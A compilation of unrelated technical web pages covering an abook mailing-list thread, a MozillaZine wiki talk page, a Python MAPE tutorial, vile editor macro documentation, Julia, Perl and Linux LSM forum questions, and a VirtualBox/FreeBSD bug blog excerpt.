    pointer to function(pointer to struct abook_ops {pointer to function(..) returning pointer to char real_db_field_get, pointer to function(..) returning pointer to char real_get_first_email, pointer to function(..) returning int real_db_field_put, pointer to function(..) returning int real_add_item2database, pointer to function(..) returning pointer to pointer to char item_do, pointer to function(..) returning int real_item_fput, pointer to function(..) returning pointer to char real_item_fget, pointer to function(..) returning int real_db_enumerate_items, pointer to function(..) returning int real_enumerate_fields, pointer to function(..) returning int real_field_id, pointer to function(..) returning union ret_value {..} field_query, pointer to function(..)
returning int real_declare_unknown_field, pointer to fun= ction(..) returning union opt_value {..} opt_get_value}, pointer to struct = abook_list_t {pointer to char data, pointer to struct abook_list_t {..} nex= t}) returning pointer to struct filter_ops {pointer to function(pointer to = struct __FILE {..}, struct db_enumerator {..}) returning int export, pointe= r to function(pointer to struct __FILE {..}) returning int import, pointer = to function() returning pointer to char description} "=3D" pointer to void "ui.c", line 229: warning: argument #2 is incompatible with prototype: prototype: pointer to char : "/usr/include/curses.h", line 1104 argument : pointer to const char ui.c warning is not related to new module code. --=20 Jaakko Dear Folks, On Wed, Nov 02, 2005 at 11:04:51AM +0100, Cedric Duval wrote: >. >=20 >. >=20 > These channels are respectively stderr, stdin and stdout of the > external filter. Now I need to define a convenient protocol... >=20 > This feature should lower the entry level required to write new > filters, as anyone will be able to use his favourite language, > presumably one more adapted to text processing than C is. A really good idea. I also use abook to generate LaTeX phone lists. I generate them by directly parsing the abook database. However, if the backend changes, then my Perl program would need to change. If there is a standard interface to access the data from abook, then my Perl program could become and "export to LaTeX" filter. If anyone is interested, the program is available on. There is a little shell script to drive it at. There are some header and footer files at and --=20. These channels are respectively stderr, stdin and stdout of the external filter. Now I need to define a convenient protocol... This feature should lower the entry level required to write new filters, as anyone will be able to use his favourite language, presumably one more adapted to text processing than C is. 
-- 
Cédric
https://sourceforge.net/p/abook/mailman/abook-devel/?viewmonth=200511
I moved the talk help to Talk. Informational pages, such as those about how to use the wiki, shouldn't be conducted in the Talk namespace (which is where this article is), but in the main namespace. The Talk namespace is for discussing articles, not writing them. Adam Conover 11:42, 19 Feb 2004 (PST)

I added an "External links" section with two Wikipedia articles (Wikipedia: Comparison of web browsers and Wikipedia: Comparison of e-mail clients) then redirected the "Product comparison matrix" article to this one, as discussed here. Alice Wyman 15:53, 5 September 2006 (UTC)

I notice the image used for the Gecko icon seems to be 404. I found this logo at the MozillaZine site. Should we upload a scaled version of the image to the wiki and use it? -- schapel 17:15, 7 December 2006 (UTC)

Re: I guess it would make most sense if the icons were hosted on MZ or mozilla.org. If somebody has some contacts... Uploading images to Imageshack and linking there is OK, I guess, but it would be better if we could upload images to mozillazine.org.

Np mentions on his user page under KB wishlist: "Image uploading for screenshots. Likely just a configuration kerz turned off. Limiting it to a certain size and only images is OK." I don't know if Np discussed it with kerz but you could ask, I guess, or bring it up on the Knowledge Base changes page. If mozillazine.org has space for all these avatars I don't see why we can't upload some images for the KB articles. Alice Wyman 21:24, 8 December 2006 (UTC)

The "Upload file" feature has just been enabled (see Knowledge_Base_changes#Upload_file_enabled) so I uploaded all the images for this article to kb.mozillazine.org and replaced all the old image links with the new ones. Alice Wyman 00:14, 28 December 2006 (UTC)
http://kb.mozillazine.org/Talk:Summary_of_Mozilla_products
The mean absolute percentage error (MAPE) is commonly used to measure the predictive accuracy of models. It is calculated as:

MAPE = (1/n) * Σ(|actual – prediction| / |actual|) * 100

where:

- Σ – a symbol that means "sum"
- n – sample size
- actual – the actual data value
- prediction – the predicted data value

MAPE is commonly used because it's easy to interpret and easy to explain. For example, a MAPE value of 11.5% means that the average difference between the predicted value and the actual value is 11.5%.

The lower the value for MAPE, the better a model is able to predict values. For example, a model with a MAPE of 5% is more accurate than a model with a MAPE of 10%.

How to Calculate MAPE in Python

There is no built-in Python function to calculate MAPE, but we can create a simple function to do so:

    import numpy as np

    def mape(actual, pred):
        actual, pred = np.array(actual), np.array(pred)
        return np.mean(np.abs((actual - pred) / actual)) * 100

We can then use this function to calculate the MAPE for two arrays: one that contains the actual data values and one that contains the predicted data values.

    actual = [12, 13, 14, 15, 15, 22, 27]
    pred = [11, 13, 14, 14, 15, 16, 18]

    mape(actual, pred)

    10.8009

From the results we can see that the mean absolute percentage error for this model is 10.8009%. In other words, the average difference between the predicted value and the actual value is 10.8009%.

Cautions on Using MAPE

Although MAPE is easy to calculate and interpret, there are two potential drawbacks to using it:

1. Since the formula to calculate absolute percent error is |actual - prediction| / |actual|, MAPE is undefined whenever any of the actual values are zero, because that would require dividing by zero.
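To make the first caveat concrete (this example is an addition, not from the original article): with the same `mape` helper, a single zero among the actual values makes the result infinite, since NumPy's float division by zero yields `inf`.

```python
import numpy as np

def mape(actual, pred):
    # same helper as above
    actual, pred = np.array(actual), np.array(pred)
    return np.mean(np.abs((actual - pred) / actual)) * 100

# First actual observation is zero, so |0 - 1| / |0| is infinite,
# and the mean of any array containing inf is inf.
with np.errstate(divide="ignore"):  # silence the divide-by-zero warning
    result = mape([0, 10, 20], [1, 9, 21])
print(result)  # inf
```

In practice this means MAPE should only be used on data where the actual values are bounded away from zero, or replaced with a metric such as MAE that has no denominator.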
https://www.statology.org/mape-python/
vile presents a couple of forms of what are commonly called "macros". This document presents information on those written in the builtin "macro language". (The other form of macro is a "keyboard macro", a simple stored sequence of vile keystrokes, which can be replayed on command.)

Macros written in the macro language can be bound to keys, run from files or buffers, given names (in which case they're known as "procedures"), and in the last case, those names may be directly introduced into vile's command set.

The language can execute any valid vile command, using one of its "named" forms. That is, the command that would be executed would be "down-line", "forward-line", or "next-line", but it would not work to write the macro to use 'j'. vile commands can be linked together in repetitive or conditional ways using various builtin directives (e.g. "if", "else", "while", "break", etc), and intermediate results can be stored in string-valued temporary variables. Other forms of variable can be used to reference parts of vile's current state, e.g. the current line number. Finally, there is a set of functions that can act on variables, to concatenate them, compare them, increment them, change their representation, etc.

Each of these language aspects will be described in turn, but first the execution framework must be explained. In the simplest case, valid macro language constructs are placed in a file or buffer and subsequently executed with one of vile's execution commands.

The most common example of this usage is vile's startup file, which is "sourced" during the editor's invocation. Typically, the startup file configures the user's preferences and looks something like this:

    set ai
    set ts=4
    set flash
    <etc.>

A startup/configuration file might also use macro language directives to conditionally configure the editor.
For example, if xvile executes this startup file fragment:

    ~if &sequal $progname "xvile"
        set-variable $title $cbufname
    ~endif

then the editor's X window titlebar changes. However, "standard" vile (i.e., non-gui vile) ignores this fragment and thus, a single startup file can be used to configure both the gui and non-gui versions of the editor.

vile also provides constructs that encapsulate macro language elements as numbered and named programs. These programs represent the entity that most programmers identify as a "true" macro. And in fact, the remainder of this document will simply assume that the word "macro" refers to one of the aforementioned program types.

A numbered macro is defined with this syntax:

    <number> store-macro
        <language element>
        ...
        <language element>
    ~endm

A numbered macro is executed using this command:

    execute-macro-<number>

To bind a keystroke to this macro, use this command:

    bind-key execute-macro-<number> <keystroke>

Here's an actual example:

    30 store-macro
        write-message "this is a test macro"
    ~endm
    bind-key execute-macro-30 #h

Now, whenever "#h" is pressed, a message is written on the editor's message line. Although this syntax serves a purpose, it's obvious that numbered programs don't lend themselves to easy recall (quick, what does macro 22 do?). But this format was an integral part of vile for many years, simply because named macros could not be bound to keystrokes. This restriction has been removed, rendering this feature essentially obsolete. The only advantage of numbered macros over named macros is that the former do not share the same namespace as vile's commands. This attribute can be advantageous when creating macros recalled solely via key bindings.

For completeness' sake, it should be mentioned that numbered macros are allocated from a fixed pool (default is 40 macros). This fixed pool can be increased via the following configuration option:

    --with-exec-macros=N    specify count of numbered macros

A named macro (stored procedure) is defined with this syntax:

    store-procedure <unique-name> ["help-string"]
        <language element>
        ...
        <language element>
    ~endm

A stored procedure is executed by simply referencing its name. To bind a keystroke to this macro, use this command:

    bind-key <unique-name> <keystroke>

Here's the stored procedure equivalent of macro number 30 above:

    store-procedure write-msg-tst "displays test message"
        write-message "this is a test macro"
    ~endm
    bind-key write-msg-tst #h

Two mechanisms now exist for executing this macro:

    :write-msg-tst
    #h

Named macros may have parameters. Like Bourne shell, the parameters are denoted '$' followed by a number, e.g., $1 for the first parameter. The individual parameters are evaluated when the macro is invoked, and may consist of expressions. They are stored as strings.

The macro interpreter uses a template in the definition to define the types of parameters which are accepted. For each parameter, a keyword, optionally followed by the prompt string, is required. Keywords (which may be abbreviated) include

    bool
    buffer
    directory
    enum (see below)
    file
    integer
    majormode
    mode
    register
    string
    variable

Unless overridden, the prompt for each parameter is named after the keyword. Override the prompt by an assignment, e.g.,

    store-procedure Filter f="Input" f="Output"

to begin a macro 'Filter' with two parameters, Input and Output, internally referenced by $1 and $2.

Here is a simple macro which accepts two parameters and uses them to position the cursor on a given line and zero-based character offset:

    ; macro for wingrep and similar applications that can pass
    ; both line- and column-number to external tools.
    ; usage: "winvile +WinGrep $L $C $F"
    store-procedure WinGrep i="Line" i="Offset"
        ~local %col
        setv %col &sub $2 1
        $1 goto-line
        beginning-of-line
        ~if &ge %col 1
            %col forward-character-to-eol
        ~endif
    ~endm

The 'enum' parameter type is special; it requires a second keyword which denotes the symbol table which is used for name-completion.
The table name (which cannot be abbreviated) follows the 'enum' after a colon (:), e.g.,

    store-procedure Scheme e:fcolor="Foreground"

The 'enum' tables correspond to the enumerated modes:

    *bool
    backup-style
    bcolor
    byteorder-mark
    ccolor
    color-scheme
    cursor-tokens
    fcolor
    file-encoding
    for-buffers
    mcolor
    mini-hilite
    popup-choices
    qualifiers
    reader-policy
    record-attrs (VMS only)
    record-format (VMS only)
    recordseparator
    showformat
    video-attrs
    visual-matches
    vtflash

The status values a macro can return are:

    TRUE
    FALSE
    ABORT
    SORTOFTRUE

$_ may also contain the special symbol ERROR if the macro could not run, e.g., due to too much recursion, or if the exit status was none of the standard values.

In general, macros are stored in the editor's startup file. Prolific macro authors may instead opt to sprinkle their macros across one or more external text files and source those file(s) from the startup file.

The remainder of this document describes individual language constructs. The presentation is bottom-up (i.e., reference format), so individual sections may be read in any order.

A semi-colon (;) or double-quote (") denotes a comment that extends from the delimiter to end of line. The semi-colon is inherited from MicroEMACS, the double-quote is for vi compatibility.

Note 1: The double-quote also delimits string arguments, but the command parser correctly distinguishes the various use cases.

Note 2: Inline comments (comment text that follows a command) are permitted except when used in conjunction with commands that take optional arguments. Here follow two examples of unacceptable usage:

    winopen    ; invoke win32 common open dialog
    write-file ; flush curr buffer to disk

In the first case, the winopen command attempts to browse ';' as a directory. In the second case, write-file flushes the current buffer to disk using ';' as the filename.

Lines ending with '\' are joined before interpretation.

The length of a variable name may not exceed 255 (NLINE-1) bytes of storage. Most other strings are allocated dynamically.
Like many simple languages, the macro language operates exclusively on strings. That is to say, variables are always of type "string", and need not be declared in advance.

Strings may be surrounded by double quotes. As in C-like languages, a few special characters may be represented using an "escape" notation, using a backslash and another character to represent the "special character".

It is permissible to omit the double quotes surrounding a string if the parser will not confuse it with another element of the macro language, and if it contains no whitespace, but it's probably better practice to use the quotes all the time, to reinforce the idea that all values are strings.

You may also use strings surrounded by single quotes. The single quotes override double quotes and backslashes, making it simpler to enter regular expressions. Double a single quote to insert one into a string.

As noted above, variables hold strings. These strings may represent words, text, numerical values, logical values, etc, depending on the context in which they are used. There are several distinct classes of variables, distinguished syntactically by the character preceding their name. All temporary variables, and some state variables, may be assigned to, using the "set-variable" command, or "setv" for short:

    set-variable $search "new pattern to look for"
    setv %index "1"
    setv %index2="2"

An assignment may use either an equals (=) sign, or whitespace to delimit the left/right sides of the assignment, as shown.

Temporary variables are used in macros to hold intermediate values. They are only temporary in that they aren't a "fixed" part of vile — but they _are_ persistent across invocations of one or more macros. (That is, they have global scope.) Temporary variables are prefixed with the % character, and their names may be constructed from any printing character.

State variables allow a macro to refer to and change some aspects of vile's behavior.
State variables are prefixed with a $ character, and are always referred to in lowercase. Not all state variables are settable — some are read-only. You can also refer to the value of a mode by prefixing its name with a $ character; some caveats apply, as described under "Mode variables" below.

Notes on some of the state variables:

- If none of the above options are in effect, $cfgopts will be empty ("").
- The force-empty-lines command uses this value to decide whether to add or delete blank lines to make all line-gaps the same size.
- The default (false) allows vile to search forward until it gets a match which may not necessarily include "dot".
- The default (false) behavior in vile matches from the current editing position onward.
- The number is the character offset (starting at zero) of the match. It is set to -1 if there is no match.
- The number is the character length of the match. It is set to -1 if there is no match.
- See also $term-encoding and $startup-path.
- Buffers named with the -u or -U option may be initialized before the initialization script is processed.

You may set and use the values of the editor modes (i.e., universal modes, buffer-only modes or window-only modes) as if they were state variables (e.g., "setv $errorbells=true"). The global values of the editor modes are not visible to the expression evaluator. Realistically, this feature is little used, since vile's set/setl commands, as well as the &global/&local functions, serve the same purpose.

Buffer variables (a '<' followed by a buffer name) return the current line of the specified buffer, automatically setting the position to the next line.

They are so similar to a query function that there is a function which serves this exact purpose, and which should be used in preference. Thus, one might have previously written:

    set-variable %file @"What file?"

Instead, one should now write:

    set-variable %file &query "What file?"

Functions always return strings.
Functions can take 0, 1, 2, or 3 arguments. Function names are always preceded by the & character, and can usually be shortened to just three characters, though there is little reason to do so.

Tasks that are usually implemented as "operators" in other languages are implemented as functions in vile's macro language. Thus, for example, arithmetic division which is usually written as "6 / 2" is written as "&div 6 2". (I believe this is sometimes called "prefix" notation, as opposed to the normal operator "infix" notation, or the "postfix" notation used on a stack-oriented calculator, i.e. "6 2 /".)

Depending on the function, arguments may be expected to represent generic strings, numeric values, or logical (boolean) values.

Arithmetic functions — These all return numeric values.

String manipulation functions — Two of these return numeric values; the rest return strings.

Boolean/logical functions — These all return TRUE or FALSE.

Miscellaneous functions — These all return string values. &env &indirect %foo will return the home directory pathname.

File lookups search one of several directories:

    bin – look in vile's directory
    current – look in the current directory
    home – look in user's $HOME directory
    libdir – look along $libdir-path
    path – look along user's $PATH
    startup – look along $startup-path

as well as associated access tests:

    execable – test if file is exec'able
    readable – test if file is readable
    writable – test if file is writable

The search order is fixed: current, home, bin, startup, path, libdir. Note that the directory lists may overlap.

Pieces of a filename are named as follows:

    end – suffix of the filename
    full – absolute path
    head – directory
    root – filename without suffix
    short – relative path
    tail – filename

The macro language has the capability for controlling flow and repetition through conditional, branching, and looping instructions. Complex text processing or user input tasks can be constructed in this way. The keywords that introduce this control are called "directives".
They are always prefixed with the ~ character, and they are always in all lowercase.

The "store-procedure" and "store-macro" commands both indicate the start of the body of a macro routine. ~endm indicates the end of that routine.

To prevent a failed command from terminating the macro which invokes it, the ~force directive can be used to "hide" a bad return code. For instance, the "up-line" command might fail if executed at the top of a buffer. "~force up-line" will suppress the failure. The $status variable can be used to determine whether the command succeeded or not.

You can suppress not only the check for success or failure of a macro as in ~force, but also the screen refresh, making macros run more rapidly. For example

    30 store-macro
        write-message "[Attaching C/C++ attributes...]"
        ~local $curcol $curline
        ~hidden goto-beginning-of-file
        ~hidden attribute-from-filter end-of-file "vile-c-filt"
        write-message "[Attaching C/C++ attributes...done ]"
    ~endm
    bind-key execute-macro-30 ^X-q

causes the screen updates from moving the current position to the beginning of the file and then filtering (which moves the position to the end-of-file) to be suppressed. The screen will be updated after completion of the macro, after the current position has been restored from the values saved with the ~local directive.

Rather than suppress all screen updates, you may suppress any messages that are written as the command progresses.

The conditional directives (~if, ~elseif, ~else and ~endif) control execution of macro commands in the expected manner. The ~if directive is followed by a string which is evaluated for truth or falsehood according to the rules outlined for boolean variables, above.
The following fragment demonstrates the use of this family of directives:

    beginning-of-line
    ; test for '#'
    ~if &equ $char 35
        set-variable %comment-type "shell comment"
    ; test for ';'
    ~elseif &equ $char 59
        set-variable %comment-type "vile macro language comment"
    ~else
        write-message "Not an expected comment type"
        ~return
    ~endif
    write-message &cat "The current line is a " %comment-type

What would a decent programming language be without a "goto"? The ~goto directive is followed by the name of a label. Labels may appear anywhere in the current macro definition, and are themselves preceded with a * character.

    ~force up-line
    ~if &not $status
        ~goto foundtop
    ~endif
    ...
    ...
    *foundtop
    write-message "At top of buffer"

The block of statements bracketed by ~while and ~endwhile is executed repeatedly, until the condition being tested by ~while becomes false.

    ; how many occurrences of a given pattern in a buffer?
    set nowrapscan
    set-variable %lookfor somepattern
    ; we'll count one too many
    set-variable %howmany "-1"
    set-variable %continue yes
    ~while %continue
        ~force search-forward %lookfor
        set-variable %continue $status
        set-variable %howmany &add %howmany "1"
    ~endwhile
    write-message &cat &cat %howmany " appearances of " %lookfor

The ~break directive allows early termination of an enclosing while-loop. Extending the above example:

    ; count the occurrences of a pattern in all buffers
    set nowrapscan
    set noautobuffer
    rewind
    set-variable %lookfor pgf
    set-variable %howmany "0"
    set-variable %buffers "1"
    set-variable %cont yes
    ~while true
        goto-beginning-of-file
        ~while true
            ~force search-forward %lookfor
            ~if &not $status
                ~break
            ~endif
            set-variable %howmany &add %howmany "1"
        ~endwhile
        ~force next-buffer
        ~if &not $status
            ~break
        ~endif
        set-variable %buffers &add %buffers "1"
    ~endwhile
    set-variable %msg %lookfor
    set-variable %msg &cat %msg " appeared "
    set-variable %msg &cat %msg %howmany
    set-variable %msg &cat %msg " times in "
    set-variable %msg &cat %msg %buffers
    set-variable %msg &cat %msg " buffers."
    write-message %msg

The ~return directive causes immediate exit of the current macro, back to the calling macro, or to user control, as appropriate.

The ~local directive causes the variables which are listed to be saved at that point (once if the directive is within a loop), and automatically restored at the end of the current macro. If the directive specifies a temporary variable which was not defined before, it will be deleted rather than restored. For example:

    ~local $curcol $curline

will restore the cursor position. The order is important in this example, because vile restores the variables in the reverse order of the ~local declaration. If $curline is set, $curcol will be reset to the first column as a side effect. So we specify that $curcol is restored last.

~local can save/restore the state of mode variables [1], user variables and the state variables shown with show-variables. Note that setting certain variables, such as the cursor position, will have side effects, i.e., modifying the display. If these are distracting, use ~hidden or ~quiet to suppress display updates until the macro completes.

[1] Subject to the limitations described above for "Mode variables". Namely, "global values of the editor modes are not visible to the expression evaluator."

Tokens following the ~with directive will be prepended to succeeding lines of macro until the next ~endwith directive, or the end of the current macro. This is useful for simplifying majormode directives, which are repetitive. Use ~elsewith as a convenience for fences; otherwise it functions just as ~with does. For example, use

    define-mode txt
    ~with define-submode txt
        suf "\\.txt$"
        comment-prefix "^\\s*/\\?--"
    ~endwith

rather than

    define-mode txt
    define-submode txt suf "\\.txt$"
    define-submode txt comment-prefix "^\\s*/\\?--"
    define-submode txt comments "^\\s*/\\?--\\s+/\\?\\s*$"

The ~trace directive controls macro tracing: ~trace on activates tracing, ~trace off deactivates it, and ~trace alone prints a message telling if tracing is active.
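As one more small worked example (an addition, not from the original document) combining temporary variables, state variables, the &cat function, ~local, and a key binding; the macro name and the #w binding are arbitrary choices:

```
; report the current cursor position on the message line
store-procedure where-am-i "report the current line and column"
    ~local %msg
    setv %msg &cat "line " $curline
    setv %msg &cat %msg &cat ", column " $curcol
    write-message %msg
~endm
bind-key where-am-i #w
```

Because %msg is declared ~local and was not defined before, it is deleted again when the macro returns, so it cannot collide with a %msg used by another macro.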
The "show-commands" command lists _all_ available editor commands. This is, admittedly, a large list and generally grows with successive releases of the editor. Fortunately, most editor commands include short help strings that describe their purpose. To winnow the list to a particular area of interest, use the "apropos" command (e.g., "apropos append"). To determine the command bound to a specific key, use "describe-key".

The format of the apropos, describe-key, and show-commands listing is as follows:

    command-name optional-key-binding(s) optional-command-name-aliases
      (help-string)

Commands fall into three broad categories: simple, motion, operator.

    "find-tag" ^] or "ta" or "tag"
      ( look up the given (or under-cursor) name as a "tag" )

From the perspective of writing a macro, it can be seen that find-tag has two aliases, either of which may be substituted for the "find-tag" name within a macro definition. Notice that the help string mentions a "name" argument and sure enough, if you type ":find-tag" within the editor, you'll be prompted for a "Tag name". This gives us enough information to write a contrived macro that finds a fixed tag name:

    store-procedure tryit
        tag "filterregion"
    ~endm

Note also that some help strings include a "CNT" keyword, which indicates that the command name may be preceded by an integer count that repeats the command action that many times (default CNT value is 1). For example, here's the "join-lines" listing:

    "join-lines" J
      ( join CNT lines together with the current one )

And here's a macro that joins 4 lines:

    store-procedure join4
        4 join-lines
    ~endm

Within a macro, the following general syntax invokes a motion:

    [count] region-spec

The optional "count" specifies the number of affected region-specs (default value is 1).
An example motion is "back-line", and here is its show-commands listing:

    "back-line" k #-A or "previous-line" or "up-arrow" or "up-line"
      (motion: move up CNT lines )

Note that the help string is prefixed with the word "motion", which unambiguously identifies the nature of this command. Given the above information, we can write a contrived macro to move the cursor up three lines:

    store-procedure upthree
        3 back-line
    ~endm

Operators manipulate regions. The "show-operators" command lists the editor's operator commands. By convention, most operator names end with "-til" (short for "until"). Within a macro, the following general syntax invokes an operator:

    [count] operator-name region-spec [args...]

Here is an example operator listing:

    "flip-til" ^A-~ or "~"
      (operator: exchange upper and lowercase on characters in the region)
      (may follow global command)

A salient point to note within the help string is the "operator" keyword, which unambiguously identifies the purpose of this command. Given the above information, we can write a macro to flip the case of the current paragraph:

    store-procedure flippara
        up-paragraph                ; move to beginning of para
        flip-til down-paragraph     ; flip case of entire para
    ~endm

One might be tempted to bind this macro to a key using this syntax:

    bind-key flippara g

and then attempt to use a numerical argument to control the number of affected paragraphs. I.e., type "3g" to flip three paragraphs. But this actually invokes "flippara" three times in a row, which (due to the sequential up- and down-paragraph motions), flips the case of the _same_ paragraph three times. However, we can work around that obstacle with the use of an interactive variable:

    store-procedure flippara
        setv %dflt 1
        setv %quest @&cat &cat "Flip how many para [" %dflt "]? "
        ~if &sequal %quest ""
            setv %quest %dflt
        ~endif
        up-paragraph
        %quest flip-til down-paragraph
    ~endm

vile's popup-msgs mode pops up the [Messages] buffer to show text written to the message line.
Closing the [Messages] buffer window clears its content until the next message is written. This mode is most useful when debugging macros, since many messages may appear, each overwriting a previous one.

Let's use this macro fragment for illustration:

    ~if &greater $blines 0
        ; buffer has at least one line of data, proceed
    ~else
        ; this is unexpected!
    ~endif

Suppose the macro is taking the unexpected code path in one of several buffers, but you don't know which. To trace the path, modify the macro like so:

    ~if &greater $blines 0
        ; buffer has at least one line of data, proceed
    ~else
        ; this is unexpected!
        setv %msg &cat "Error: Buffer " &cat $cbufname " empty"
        write-message %msg
    ~endif

Next, enable popup-msgs (i.e., set popup-msgs) and then start the macro. When the "write-message" command is executed, the [Messages] buffer pops up and displays the string written by the unexpected code path. Disable popup-msgs using this command:

    :set nopopup-msgs

The startup file included below illustrates several of the language constructs described in this document. This example is crafted for the win32 environment, but its syntax and usage are applicable to any host OS supported by vile.

    set ai aw ts=4 sw=4 flash
    bind-key next-window ^N
    bind-key previous-window ^P

    ~if &sequal $progname "winvile"
        set-variable $font "r_ansi,8"
    ~endif

    ~if &equal 0 &sindex &lower $shell "command.com"
        set w32pipes
    ~else
        set now32pipes
    ~endif

    ~if &not &equal 0 &sindex $cfgopts "perl"
        perl "use hgrep"
        perl "use dirlist"
    ~endif

    ~if &not &equal 0 &sindex $cfgopts "oleauto"
        set redirect-keys=&cat &global redirect-keys ",MULTIPLY:A:S"
    ~endif

    ; modify ^A-i and ^A-o so that they don't wrap inserted text.
    store-procedure save-wrap-state
        setv %wm=$wrapmargin
        setv %ww=$wrapwords
        setl nowrapwords wm=0
    ~endm
    store-procedure restore-wrap-state
        setl wrapmargin=%wm
        ~if %ww
            setl wrapwords
        ~else
            setl nowrapwords
        ~endif
    ~endm
    store-procedure insert-chars-noai-nowrap
        save-wrap-state
        insert-chars-no-autoindent
        restore-wrap-state
    ~endm
    bind-key insert-chars-noai-nowrap ^A-i
    store-procedure open-line-below-noai-nowrap
        save-wrap-state
        open-line-below-no-autoindent
        restore-wrap-state
    ~endm
    bind-key open-line-below-noai-nowrap ^A-o

    ;Rather than composing documents in a word processor, it's much
    ;more efficient to use vile. But pasting vile-formatted text into,
    ;say, MS Word is a pain in the neck because each paragraph needs
    ;to be reformatted. Example:
    ;
    ;   vile txt
    ;   ========
    ;   para 1 line1,
    ;   line 2,
    ;   line 3,
    ;   line 4
    ;
    ;   para 2 line 1,
    ;   line 2,
    ;   line 3,
    ;   line 4
    ;
    ;If "vile txt" is copied and pasted into Word, it looks awful because
    ;the lines of the paragraphs do not flow together (i.e., the new lines
    ;terminating each vile paragraph serve as a "hard" paragraph break).
    ;
    ;'Twould be nice if vile could join each paragraph so that "vile txt"
    ;above looked like this:
    ;
    ;   vile txt
    ;   ========
    ;   para 1 line1, line 2, line 3, line 4
    ;
    ;   para 2 line 1, line 2, line 3, line 4
    ;
    ;Then, when this version is pasted into Word, all paragraphs are
    ;automatically reformatted. Here's a macro that adds this feature:
    store-procedure join-all-para
        goto-beginning-of-file
        write-message "[joining all paragraphs...]"
        ~while true
            ~force join-lines-til down-paragraph
            ~if &not $status
                ~break
            ~endif
            goto-bol
            ~force 2 down-line      ;skip to next para
            ~if &not $status
                ~break
            ~endif
        ~endwhile
    ~endm

This document, and the macro language it describes, owes a debt of thanks to Dan Lawrence and his MicroEMACS text editor. Many of the features described herein first appeared in this form in MicroEMACS.
https://www.invisible-island.net/vile/macros.html
I was dreading getting Travis to work on both 0.6 and 1.0, as I believed that Pkg.dir would throw an error in 1.0, but mercifully I discovered today that even in 1.0 Pkg.dir still only gives a warning. I was wondering why that is; is there a plan to bring it back?

Unfortunately the new pathof alternative is rather unwieldy in Travis scripts:

    import Pkg, PackageName; cd(joinpath(dirname(pathof(PackageName)), "..", "otherdir")); other_functions()

Of course this code doesn't work on 0.6. Without knowing how to make version-dependent Travis scripts, I've taken to doing

    VERSION < v"0.7-" || using Pkg; cd(Pkg.dir("PackageName"))

since using Pkg throws an error in 0.6. Does anyone have any more elaborate Travis or AWS scripts or yamls for both 0.6 and 1.0 that they care to share as helpful examples?
https://discourse.julialang.org/t/status-of-pkg-dir-and-writing-travis-and-other-configs/13502
craigt has asked for the wisdom of the Perl Monks concerning the following question:

I'm working on a Windows platform using an Apache server and dHTML - HTML, CSS, JavaScript, Perl/CGI, and a number of APIs. I have a custom parameter file that's read into a CGI module. The parameters in that file allow a user to customize the geography and appearance of the application. The parameters in that file are embedded in the CSS, JavaScript, and Perl code in the CGI module.

I define my Perl variables at the beginning of the module, with names like $navytext. I then read the custom parameter file into an array. The parameters in the file have the same names as the variables I define in the CGI module. I split the comment portion of each parameter line off and eval the parameter value into the CGI module, where it is then used downstream in CSS, JavaScript, and Perl. A simplified code example follows.

    my $navytext;  # This variable appears as the line "$navytext = '000066' # Navy blue text." in the custom parameters file below.
    ...
    my $cpsfnx = $thepdir . 'custom.parms';
    if (-e $cpsfnx) {
        my @cpslnsx = in_shared($cpsfnx);
        my $cpsln = '';
        foreach $cpsln (@cpslnsx) {
            if (index($cpsln, '#') > 1) {
                ($cpsln, $tmp) = split('#', $cpsln);
            }
            eval($cpsln);
        }
    }
    ...
    <HEAD>
    <STYLE>
    #tabmenu {
        color: #$navytext;
    }

Notice in the example that the CSS with the Perl variable $navytext resides right in the Perl module. This has all worked well for some time. Now I would like to remove the CSS from the Perl module, put it in a CSS file, and link the CSS file into the Perl module. When I do this, the Perl variable no longer resolves correctly to the HTML color and the CSS does not work. I have tried to quote the Perl variable in the CSS file in several ways with no luck.

The question is: can I link an external CSS file with embedded Perl variables into a CGI module so that the Perl variables resolve correctly?

What you want is to use one of the many templating systems.
See Template for a selection of those. If you're hell-bent on rolling your own, just to keep the precious Perl variables, my suggestion is to declare them explicitly in a hash and to replace them with a tiny loop:

    my %template_variables = (
        'navytext' => $navytext,
        # ...
    );

    my $css = <<'CSS';
    #tabmenu {
        color: #$navytext;
    }
    CSS

    sub fill_template {
        my ($str, $vars) = @_;
        $str =~ s!\$(\w+)!$vars->{$1} || '$' . $1!ge;
        $str;
    };

    print fill_template($css, \%template_variables);

Thanks for the suggestion Corion.
https://www.perlmonks.org/?node_id=1223576
Yes, I know asking this question here is a little off-topic, but I think someone here might give me the answer.

I want to write a simple filesystem interception program based on the LSM, with functions like preventing a file from being added to a directory, and so on. Somebody told me to use the LSM, but in fact I could not find useful information on how to write an LSM module. So I consulted the SELinux code in the kernel, and then wrote a very simple kernel module:

Code:
    #include <linux/kernel.h>
    #include <linux/init.h>
    #include <linux/security.h>

    struct security_operations ops;
    int flag;

    static int my_not_rename(struct inode *old_inode, struct dentry *old_dentry,
                             struct inode *new_inode, struct dentry *new_dentry)
    {
        return 0;
    }

    static int __init mylsm_init(void)
    {
        int flag;
        ops.inode_rename = my_not_rename;
        flag = register_security(&ops);
        if (flag != 0) {
            //error
        }
        return 0;
    }

    static void __exit mylsm_exit(void)
    {
    }

    module_init(mylsm_init);
    module_exit(mylsm_exit);

I actually do not know what would happen if my module could be insmod'ed into the kernel, but in fact it cannot be, because of a build warning: WARNING: "register_security" [xxxxxxxxxxxxxx.ko] undefined!

I found a guy with the same problem: Compile and install modules without kernel recompile. It seems that register_security() is not an exported kernel symbol...

Well, if register_security() can't be used, how can I finish my module based on the LSM? I have asked in some other places, but nobody has given me an answer. Backtrack still won't run properly on my computer because of my network adapter, but I hope somebody here can help me with my problem. Thanks a lot.
http://www.backtrack-linux.org/forums/printthread.php?t=30297&pp=10&page=1
Bug investigation (part 1 - tale of sir VIF)
By nike on Mar 12, 2009

I'm receiving the following message when certain commands are run in FreeBSD 6.2 and VirtualBox 1.4.0:

    sigreturn: eflags 0x80247

This error was one of the nasty blockers to running FreeBSD reliably as a guest, and since I thought it would be a good idea to support it, I looked into this bug. As was pointed out in the bug report, the message is triggered by:

    if (!EFL_SECURE(eflags & ~PSL_RF, regs->tf_eflags & ~PSL_RF)) {
        printf("sigreturn: eflags = 0x%x\n", eflags);
        return (EINVAL);
    }

in the FreeBSD kernel's sys/i386/i386/machdep.c. This check essentially means that some bit FreeBSD considers insecure was toggled in the EFLAGS CPU register. The bit of interest is the VIF bit, which has a rather convoluted story behind it.

